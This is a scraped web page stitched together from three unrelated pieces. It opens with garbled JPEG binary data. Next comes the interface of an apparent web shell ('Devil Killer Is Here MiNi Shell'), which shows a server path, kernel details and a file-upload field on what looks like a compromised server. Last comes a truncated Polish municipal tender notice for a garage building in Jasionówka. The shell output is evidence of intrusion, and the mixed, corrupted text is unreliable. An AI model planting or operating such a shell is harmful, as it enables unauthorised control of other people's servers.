JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241011/0054330901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa budynku garażowego z wykorzystaniem hali o głównej konstrukcji łukowej w systemie „Zaprojektuj i Wybuduj wraz z zakupem i dostawą kontenera socjalnego - biurowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JASIONÓWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659332</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasionówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857278030</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@jasionowka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa budynku garażowego z wykorzystaniem hali o głównej konstrukcji łukowej w systemie „Zaprojektuj i Wybuduj wraz z zakupem i dostawą kontenera socjalnego - biurowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7dc79432-e784-44b4-a66d-6d4232fa9e85</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00543309</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00040431/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa hali z zapleczem sanitarno - socjalnym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7dc79432-e784-44b4-a66d-6d4232fa9e85 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym w Wykonawcą, odbywać się<br/>będzie przy użyciu środków komunikacji elektronicznej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania<br/>z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie<br/>internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>3. Komunikacja między Zamawiającym a Wykonawcami odbywać się będzie za<br/>pośrednictwem portalu – https://ezamowienia.gov.pl a po otwarciu ofert Zamawiający<br/>dodatkowo dopuszcza komunikację za pomocą poczty elektronicznej e-mail.<br/>4. W celu wzięcia udziału w postępowaniu, Wykonawca musi posiadać konto na Platformie.<br/>Rejestracja i utrzymywanie konta na Platformie, a także korzystnie z Platformy jest bezpłatne.<br/>5. Wymagania techniczne i organizacyjne korzystania z Platformy, instrukcja korzystania<br/>z Platformy znajdują się na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.<br/>6. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej<br/>w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku<br/>„Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów<br/>elektronicznych, w którym znajdują się dwa pola drag&amp;drop (przeciągnij” i „upuść”) służące do<br/>dodawania plików. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust.1<br/>p.z.p., podmiotowych środków dowodowych przyjmuje się datę ich przekazania na Platformie e-<br/>Zamówienia.<br/>7. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to<br/>250 MB.<br/>8. Uwaga! W Rozporządzeniu KRI nie występują: .rar .gif .bmp .numbers .pages.<br/>Dokumenty złożone w takich formatach zostaną uznane za złożone nieskutecznie.<br/>9. Zamawiający dopuszcza przesyłanie plików w formatach danych określonych<br/>w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U.<br/>z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docx, .rtf lub .odt, pades, xades.<br/>Zamawiający zaleca przesyłanie plików w formacie .pdf .<br/>10. Zalecenia Zamawiającego dotyczące kwalifikowanego podpisu elektronicznego:<br/>1) dla dokumentów w formacie .pdf zaleca się zastosowanie podpisu w formacie PadES lub<br/>XadEs,<br/>2) dla dokumentów w formacie innym niż .pdf zaleca się zastosowanie podpisu<br/>wewnętrznego w formacie XAdES. Wykonawca zobowiązany jest załączyć plik<br/>z dokumentem oraz plik z podpisem, czyli dwa pliki.<br/>11. Zamawiający nie przewiduje komunikowania się zamawiającego z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektroniczne</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.17.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wraz z uzyskaniem<br/>niezbędnych zezwoleń oraz wykonaniu robót budowlanych w ramach zadania pn.: „Budowa<br/>budynku garażowego z przeznaczeniem na pojazdy komunalne oraz przeznaczone do<br/>przewozu osób z wykorzystaniem hali o głównej konstrukcji łukowej o wym. zewnętrznych 15<br/>x 27,5m w systemie „Zaprojektuj i Wybuduj” wraz z zakupem i dostawą kontenera socjalnego -<br/>biurowego polegających na realizacji budowy budynku garażowego z wykorzystaniem hali o<br/>głównej konstrukcji szkieletowo - łukowej, zlokalizowanego na terenie działki dawnej gminnej<br/>hydroforni. Hydrofornia wraz z doziemnymi instalacjami ją zasilającymi będzie rozebrana w<br/>odrębnym trybie wg. odrębnej procedury administracyjnej przez zamawiającego. Działka o nr<br/>442 położona przy ulicy Grodzieńskiej 36, posiada bezpośredni dostęp do tejże ulicy realizowany<br/>poprzez istniejący zjazd publiczny, z której planuje się nadal realizację głównego dojazdu w celu<br/>dostępu do nowego budynku. Budynek nie będzie posiadał instalacji wewnętrznych. Projektuje<br/>się instalację branży elektrycznej jako instalację odgromową oraz uziemienia. W ramach zadania<br/>Wykonawca dostarczy kontener socjalno- biurowy 1 szt. szczegółowa specyfikacja zawarta w<br/>rozdz. III ust. 3 SWZ . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OPIS KRYTERIÓW OCENY OFERT I SPOSÓB OCENY OFERT<br/>1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i<br/>ich znaczeniem:<br/>1) Cena ofertowa - 60%<br/>2) Okres gwarancji – 40%<br/>Ad 1) ocena ofert w kryterium „Cena ofertowa” (C) nastąpi wg następującego wzoru:<br/>C = (Cmin ÷ Co) x 60 pkt<br/>gdzie:<br/>C – liczba punktów w kryterium ceny ofertowej<br/>Cmin – najniższa cena spośród ofert nieodrzuconych<br/>Co – cena oferty badanej<br/>Podstawą przyznania punktów w kryterium „cena ofertowa” będzie cena brutto podana<br/>przez Wykonawcę w Formularzu Ofertowym. Cena ofertowa brutto musi uwzględniać wszelkie<br/>koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>Oferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.<br/>Ad 2) ocena ofert w kryterium „Okres gwarancji ” (G) nastąpi wg następującego sposobu:<br/>W kryterium Okres gwarancji (G) zostanie przydzielona na podstawie poniższych zakresów, z<br/>zastrzeżeniem, że wymagana minimalny okres gwarancji na prace budowlane wynosi 60<br/>miesięcy:<br/>Okres gwarancji 60 miesiące – 0 pkt<br/>Okres gwarancji 72 miesięcy – 20 pkt<br/>Okres gwarancji 84 miesięcy – 40 pkt<br/>Przy czym minimalny okres gwarancji wynosi 60 m-cy, maksymalny 84 m-ce. Wykonawca<br/>powinien zaoferować jeden z w/w okresów gwarancji. Podanie przez Wykonawcę krótszego niż<br/>60 m-cy okresu gwarancji spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5<br/>ustawy Pzp., jako niezgodnej z warunkami zamówienia. Jeżeli Wykonawca nie wypełni w ofercie<br/>pola dotyczącego okresu gwarancji, będzie to potraktowane jako zaoferowanie minimalnego<br/>wymaganego okresu gwarancji (60 miesięcy). Wykonawca może zaproponować długość okresu<br/>gwarancji dłuższy niż wyznaczony maksymalny 84 miesięcy, jednak w tym przypadku<br/>Zamawiający przyjmie do obliczeń wartość 84 m-cy - najdłuższy przyjęty w kryterium oceny<br/>ofert „Okres gwarancji na ”. Wykonawcy oferują długości okresu gwarancji w pełnych miesiącach<br/>(w przedziale od 60 do 84 miesięcy). Okres rękojmi zgodnie z obowiązującymi przepisami –<br/>art. 568 Kodeksu cywilnego – wynosi 5 lat.<br/>Oferta może uzyskać w zakresie kryterium okresu gwarancji (G) maksymalnie 40 punktów.<br/>2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę<br/>punktów, obliczoną według poniższego wzoru:<br/>W = C + G<br/>gdzie:<br/>W - wartość punktowa oferty,<br/>C - ilość punktów za kryterium: cena ofertowa,<br/>G- ilość punktów za kryterium: okres gwarancji,<br/>Łącznie oferta może uzyskać maksymalnie 100 pkt.<br/>3. Ilość punktów w poszczególnych kryteriach zostanie zaokrąglona do dwóch miejsc po<br/>przecinku (jeśli to konieczne).<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród<br/>tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający<br/>wybiera ofertę z najniższą ceną.<br/>6. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 5,<br/>zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając<br/>oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych<br/>przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> XVI. WARUNKI UDZIAŁU W POSTĘPOWANIU:<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – zamawiający wymaga, aby<br/>wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego<br/>z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub<br/>miejsce zamieszkania (w szczególności CEIDG lub KRS);<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunku w powyższym<br/>zakresie;<br/>4) zdolności technicznej lub zawodowej - Zamawiający uzna, że Wykonawca posiada<br/>wymagane zdolności techniczne lub zawodowe do należytego wykonania zamówienia, jeżeli<br/>Wykonawca wykaże, że:<br/>a) doświadczenie zawodowe: Zamawiający wymaga aby wykonawca wykazał, iż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie:<br/>- wykonał co najmniej 1 robotę budowlaną obejmujące swoim zakresem budowę,<br/>rozbudowę lub przebudowę hali o konstrukcji łukowej o wartości co najmniej 300<br/>000,00 zł brutto<br/>Uwaga: Zamawiający nie dopuszcza sumowania wartości kilku realizacji o mniejszej długości<br/>w celu wykazania spełniania warunku udziału w postępowaniu w zakresie danego zadania.<br/>b) posiada kadrę techniczną - Zamawiający wymaga aby Wykonawca wykazał, że będzie<br/>dysponować następującymi osobami, które skieruje do realizacji zamówienia,<br/>posiadającymi odpowiednie uprawnienia lub równoważne tj.:<br/>- kierownika robót branży konstrukcyjno-budowlanej - co najmniej jedna osoba<br/>posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności j.w.,<br/>które zostały wydane na podstawie obowiązujących przepisów,<br/>Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień, dopuszcza<br/>odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw<br/>członkowskich Unii Europejskiej, Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>szwajcarskiej, w zakresie, którego właściwy organ wydaje decyzję w sprawie uznania<br/>kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U. z 2020 r. poz. 220). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu<br/>o udzielenie zamówienia Wykonawca będzie zobowiązany przedłożyć:<br/>1) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału<br/>w postępowaniu lub kryteriów selekcji o którym mowa w art. 125 ust. 1 ustawy Pzp –<br/>składane wraz z ofertą na podstawie art. 273 ust. 2 Pzp (jak wskazano w rozdz. VIII<br/>ust. 1 SWZ) Wzór – Załącznik nr 2a do SWZ oraz Załącznik 2b;<br/>2) informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt<br/>1,2 i 4 ustawy, sporządzone nie wcześniej niż 6 miesięcy przed ich złożeniem -<br/>składana na wezwanie Zamawiającego<br/>3) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie<br/>do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (Wzór -<br/>Załącznik nr 4 do SWZ)- składana na wezwanie Zamawiającego,<br/>4) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem- składana na<br/>wezwanie Zamawiającego<br/>5) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania<br/>się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp<br/>e) art. 5k rozporządzenia Rady (UE) nr 833/2014<br/>f) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. Poz. 835). (załącznik nr 8 do SWZ)- składane na wezwanie Zamawiającego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w 